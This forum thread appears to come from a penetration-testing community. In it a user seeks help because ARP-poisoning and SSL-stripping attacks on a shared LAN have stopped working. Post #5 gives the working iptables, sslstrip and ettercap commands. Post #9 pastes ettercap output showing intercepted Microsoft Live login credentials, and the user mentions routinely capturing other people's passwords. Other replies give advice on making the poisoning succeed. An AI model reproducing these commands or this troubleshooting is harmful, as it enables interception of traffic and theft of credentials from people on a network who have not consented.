Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Any idea of what is going on with sniffing?

  1. #1
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Any idea of what is going on with sniffing?

    Well, here is the problem, I will post what I'm doing, hoping you can help me or any advice will be appreciated:
    Using ettercap cannot sniff.
    Cannot ping to router, or any other IP's, packets are just dropped.

    Using sslstrip cannot strip anything.

    Anyway,I can access the internet.

    I used nmap to have an idea of what is the lan and saw all 3 ip's. But one of the laptops is hosting what appears to be Apache in port 5835(HTTPD V2).
    I just cannot ping to that PC, by the way, this PC has a neme: xxxx.lan (192.xxx.xxx.64), all other ports are closed, except 5835 (open).
    I see that all nmap reports hands out the IP, but that one has the xxxx.lan?..
    Local domain?

    Ettercap, sslstrip,arpspoofing have problems with .local domains?


    Any idea?

  2. #2
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Any idea of what is going on with sniffing?

    I don't really get what you're trying to do here... Try Yamas, it's a script I wrote for sniffing. You can either use arpspoof or ettercap by launching it with argument -e.
    There is also a thread on the forums
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  3. #3
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Any idea of what is going on with sniffing?

    Not working. Can't sniff anything with yamas either. Is there any relation with avahi (disabled) and sniffing?

  4. #4
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Any idea of what is going on with sniffing?

    What kind of sniffing are you trying to do anyway ?
    What techniques did you try ?
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  5. #5
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Any idea of what is going on with sniffing?

    Comax, first of all, I want to thank you for your help and interest, I really appreciate it.
    Answering to your questions, I use ettercap and sslstrip together (separate terminals) trying to avoid the certificate message in ettercap when sniffing.
    I'm just trying to sniff in a LAN, with 4 ethernet ports and wifi acces (It is a Thompson router TG585 v8). I used to do it almost every 2 days with success. But latley, I just cannot sniff anythig at all.

    I use in Terminal 1:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -p -f
    In Terminal 2:
    ettercap -Tqi eth1 -M arp:remote // /192.168.1.254/ -P autoadd

    Just nothing can be sniffed now.

    Tried yamas as advice by friend Comax, the same outcome.

    Could be a firewall presence, a Domain?

    Thanks...

  6. #6
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Any idea of what is going on with sniffing?

    Comax, I used the script yamas, but same thing, it is not snifiing...
    Any idea?
    I'm confused..I used to captured passwds but after a tiem, I'm not able to...
    Tried the plugin from ettercap to check poisson, it says that arp poissoning did not take place...

  7. #7
    Member shadowzero's Avatar
    Join Date
    Jun 2011
    Location
    ${HOME}
    Posts
    94

    Default Re: Any idea of what is going on with sniffing?

    How do you know nothing is being sniffed? Are you expecting ettercap to print output the screen? It won't since you're passing the -q flag. Try passing -w as well to write the output to a file so you can examine it with wireshark or tcpdump.

  8. #8
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Any idea of what is going on with sniffing?

    +1 to shadowzero, you should examine the traffic (either after if you used -w or in real time, as it goes).
    Did you try arpspoof ?
    Have you tried different ways of poisoning ? One-way, two-way ? All the network, just separate targets ?
    And sorry for the stupid question, but are you sure you're using the correct gateway ?

    Now it's possible too that the router detects the flood of ARP requests and prevents it from working. Some dude reported it to be the case for him...
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  9. #9
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Any idea of what is going on with sniffing?

    Sorry for the delay. Yes I'm isolating pc's when poissoning and gateway is the same, has not been changed (192.168.1.254)...Same result..
    I tried poissoning one and two ways (using ettercap and arpspoof by separate).

    Here is some data from ettercap before and after (when working and now):

    ************************************************** **************************************************
    When it was working:

    Listening on eth1... (Ethernet)

    eth1 -> 00:0E:xx:xx:xx:xx 192.168.1.108 255.255.255.0

    Privileges dropped to UID 1000 GID 1000...

    28 plugins

    39 protocol dissectors

    53 ports monitored

    7587 mac vendor fingerprint

    1698 tcp OS fingerprint

    2183 known services

    Randomizing 255 hosts for scanning...

    Scanning the whole netmask for 255 hosts...

    * |================================================= =>| 100.00 %

    5 hosts added to the hosts list...

    ARP poisoning victims:

    GROUP 1 : ANY (all the hosts in the list)

    GROUP 2 : 192.168.1.254 00:25:xx:xx:xx

    Starting Unified sniffing...

    Text only Interface activated...

    Hit 'h' for inline help

    Activating autoadd plugin...

    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""

    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""

    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""

    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""

    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""

    HTTP : 65.54.xxx.xx:80 -> USER: xxxx_xxx@hhhhh.com PASS: xxxxxx INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1325176303&rver =6.1.6206.0&wp=MBI&wreply=http://

    HTTP : 65.54.xx.xxx:80 -> USER: jjjjjjjjjj@ggggg.com PASS: jjjjjjjjjj INFO: /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1325176303&rver =6.1.6206.0&wp=MBI&wreply=http://


    After (Not sniffing):

    Scanning for merged targets (142 hosts)...


    * |================================================= =>| 100.00 %

    4 hosts added to the hosts list...

    ARP poisoning victims:

    GROUP 1 : 192.168.1.64 00:E1:XX:XX:xx:xx

    GROUP 1 : 192.168.1.101 78:A0:xx:xx:xx

    GROUP 1 : 192.168.1.106 3C:74:xx:xx:xx

    GROUP 2 : 192.168.1.254 08:xx:xx:xx:xx (This is the gateway)

    Starting Unified sniffing...

    Text only Interface activated...

    Hit 'h' for inline help

    Activating autoadd plugin...

    DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"

    DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"

    DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"

    DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"

    autoadd: 192.168.1.70 00:1B:77:xx:xx:xx added to GROUP1

    autoadd: 192.168.1.189 28:E7:CF:xx:xx:xx added to GROUP1

    autoadd: 192.168.1.137 60:33:4B:xx:xx:xx added to GROUP1

    ************************************************** *******************************

    In the info I can see something in this lines:

    Before (when sniffing):
    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
    After (not sniffing)
    DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"

    At the end of each line, when sniffing : ""
    When not sniffing: "lan"

    When using the ettercap plugin "chk_poisson" it says taht did not poisson....

    We all are in the same subnet (192.168.1.40-253 -- Range in router's DHCP server). I also use sslstrip along with ettercap and nothing in sslstrip.log, empty...

    Using yamas, same thing, it does not sniff any passwords...

    Any idea?

  10. #10
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Any idea of what is going on with sniffing?

    Wow man... Sorry, but I'm at loss here.
    To sum up :
    It used to work.
    Nothing changed.
    It no longer works, despite the plethora of ways given to do it.

    That is weird bro. Sure your router hasn't been updated for instance ? They don't really warn you when they do this...
    Have you tried running it off a clean LiveCD/new install ?
    Running both KDE and GNOME BT5 flawlessly. Thank you !

Page 1 of 2 12 LastLast

Similar Threads

  1. idea da niubbo
    By guasto in forum Angolo Wireless
    Replies: 2
    Last Post: 04-14-2011, 10:18 AM
  2. The idea of Karma.
    By narato92 in forum Beginners Forum
    Replies: 3
    Last Post: 04-14-2010, 05:24 AM
  3. new idea to discuss as well as help
    By imported_reslan_912 in forum OLD BackTrack 4 General Support
    Replies: 0
    Last Post: 03-16-2010, 02:11 PM
  4. I have an idea
    By hellonewman in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-05-2010, 03:43 PM
  5. Can this be done? - Idea for a Honeypot
    By mummysboy in forum OLD Newbie Area
    Replies: 10
    Last Post: 11-30-2007, 11:40 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •